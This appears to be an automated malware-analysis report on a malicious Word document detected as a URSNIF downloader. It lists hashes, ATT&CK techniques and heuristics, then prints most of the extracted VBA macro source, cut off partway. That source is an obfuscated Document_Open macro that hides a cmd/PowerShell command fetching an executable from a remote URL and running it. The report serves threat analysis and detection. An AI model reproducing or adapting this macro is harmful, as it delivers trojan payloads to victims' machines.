Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f480cb2897683bf1…

MALICIOUS

Office (OLE)

70.0 KB Created: 2018-09-06 08:16:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: e03b949d67da81644a7a8d8dd3e03fc2 SHA-1: 236a2da0e18580f6c48ad34c2ecd9695f4f37e24 SHA-256: f480cb2897683bf13a028225b749815fe5cebe63809a4497b867423bf8bae9e7
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function to execute a command. This command appears to be constructing a complex string, likely a download or execution command for a second-stage payload. The ClamAV detection as 'Doc.Downloader.URSNIF-6729855-3' further supports the downloader functionality.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4169 bytes
SHA-256: f316739b3828a00e9bb6c5e60c6ec033ce62258454a7a119b0db08f2614cc93e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "QzbXtOIT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Shell Format(ddupi) + tPhziYwi + LGLrvFfwTW + pdGNKtTu + WBNvzVzXpcm + WBRhnRuVKCZw + PVqHiqPChuDQhX, vbHide
End Sub



Attribute VB_Name = "tPEnJtjhB"
Function pdGNKtTu()

On _
Error _
Resume _
Next
Month "9966" + "467446462" + "76363378" + "5156"
   Month "JVsuwLLSv" + "mPDI" + "aZWC" + "iS"
WRVlQtFVZ = Chr(9 + 4 + 11 + 3 + 72) + "md" + " /V/" + Chr(6 + 3 + 7 + 2 + 49) + Chr(3 + 1 + 3 + 1 + 26) + "^s^et" + " r^D" + "^" + "3=^ ^ " + "^ ^ " + "^" + " " + "  ^" + "  ^  "
Month "iiIm" + "S" + "fnhVX" + "97727222"
   Month "fiRFVWYHrjD" + "mc" + "365823208" + "9122"
zwOToiOGf = "^   " + " " + "  ^}^}^" + "{^h" + Chr(9 + 4 + 11 + 3 + 72) + "^" + "ta" + Chr(9 + 4 + 11 + 3 + 72) + "^};^k^" + "a^"
Month "BH" + "NHlRoB" + "19865708" + "q"
   Month "jAKjcB" + "rPqvRPWIkaWH"
bRqiPfziTN = "erb^" + ";J^i^a" + "$ ^met" + "I^-ek" + "^ovnI" + "^;)J^i^"
Month "HALIfzvBJ" + "U"
   Month "QcvF" + "or"
   Month "9968" + "6589" + "470121414" + "cTUPYCOp"
fOurHAcNWQO = "a^$ ^" + ",^q" + "O^Y$(^e" + "^li^" + "F^d" + "^ao^l"
Month "Cr" + "36621036" + "3144" + "3655"
OdCCN = "n^w^oD" + "^.^bTj$" + "^{^yrt" + "^{)r" + "^Z^m$ n" + "i^" + " qOY$(^" + "h" + Chr(9 + 4 + 11 + 3 + 72) + "aer" + "^o^" + "f^;'^e"
Month "8185" + "L" + "178856257" + "MwdmrGzh"
   Month "6212" + "mz"
   Month "510203704" + "GBj"
   Month "6269" + "mYzckGP"
zDXGuO = "xe.^'" + "+zJ^E$" + "^+'\^" + "'^+" + Chr(9 + 4 + 11 + 3 + 72) + "^i" + "^l^bu" + "p^:vne" + "$^"
Month "509348050" + "QkWD" + "9287" + "Z"
   Month "24723910" + "4899"
   Month "FZdvXz" + "p"
   Month "G" + "mmLIpYT" + "6388" + "QSICjfj"
lzaIQTOXI = "=J^i^a" + "$^;^'^" + "326'^ ^" + "=^ z^" + "J^E$^;" + ")^'" + "^@'(t" + "il^p" + "S.'n^k^" + "t.2"
Month "qT" + "ub" + "5673" + "dcOoJ"
   Month "jMswVMUd" + "VRdPbpVj"
   Month "NZpDa" + "7836" + "5831" + "hTL"
BcDPZ = "bk^o^=" + "^l^?^p" + "hp.to^" + "k^sna^" + "p" + "^o/^TT" + "R/m^" + "o" + Chr(9 + 4 + 11 + 3 + 72) + "^.^" + "by^h^"
Month "26351163" + "cVc" + "TaMR" + "Vs"
   Month "nvN" + "483737923"
   Month "oT" + "9157"
KzAMVOr = "j8a^1" + "fis^" + "th^d2//" + "^:p" + "^t^" + "t" + "h^'^=r" + "^Zm^$^" + ";" + "^" + "t"
Month "qOuzdlJoojG" + "2960" + "iG" + "jXhvjwvao"
   Month "qm" + "vWjkfNWlojP" + "h" + "7644"
NfGjc = "neil" + Chr(6 + 3 + 7 + 2 + 49) + "^b" + "^e" + "^W.teN" + "^" + " t" + Chr(9 + 4 + 11 + 3 + 72) + "^ej^b" + "^o^" + "-wen=^b"
Month "puoFmn" + "j"
   Month "dpcbYb" + "2610" + "MdVqJA" + "isBYvnfsAsb"
   Month "Hiq" + "378758750"
wJofFoFFzaT = "Tj$^ ^l" + "^le^h" + "^" + "s" + "r" + "^ewop&" + "&^" + "f^or /^" + "L %^B" + " ^in (2"
Month "uQDY" + "430086259"
   Month "247882774" + "Kj"
bzZnzOnBb = "6^3^;" + "^" + "-^" + "1" + "^" + ";^" + "0)^do" + " ^s^et" + " ^K" + "^s^jb" + "=!^K^" + "s"
pdGNKtTu = WRVlQtFVZ + zwOToiOGf + bRqiPfziTN + fOurHAcNWQO + OdCCN + zDXGuO + lzaIQTOXI + BcDPZ + KzAMVOr + NfGjc + wJofFoFFzaT + bzZnzOnBb
   Month "9702" + "kAmv"
   Month "1556" + "181" + "A" + "208717829"
   Month "qP" + "VlEv" + "130475062" + "7900"
   Month "pQEV" + "Gjju" + "FklbpLDr" + "143029786"
End Function
Function WBNvzVzXpcm()

On _
Error _
Resume _
Next
Month "109673926" + "ucB"
   Month "vvN" + "9683" + "2406" + "227806542"
   Month "34" + "jXiZ" + "28842651" + "ROIw"
LHQRQBKljD = "^jb!" + "!r^D^" + "3:~%" + "^B,1!&" + "&i^f" + " %^B" + " ^le^q " + "^0 " + Chr(9 + 4 + 11 + 3 + 72) + "a" + "^l^l "
Month "7630" + "FmuJXJz"
   Month "JQaZ" + "ikq"
   Month "lPJU" + "mLBLBmwBCTtR" + "230901137" + "52506431"
   Month "Bsw" + "3205"
jLJwhuIDaJ = "%^" + "K^s" + "^jb:*" + "^Ksj^b" + "^!=%" + Chr(3 + 1 + 3 + 1 + 26) + "  "
WBNvzVzXpcm = LHQRQBKljD + jLJwhuIDaJ
   Month "52037817" + "BKYHnLZQA"
   Month "R" + "iCuE" + "D" + "8703"
   
... (truncated)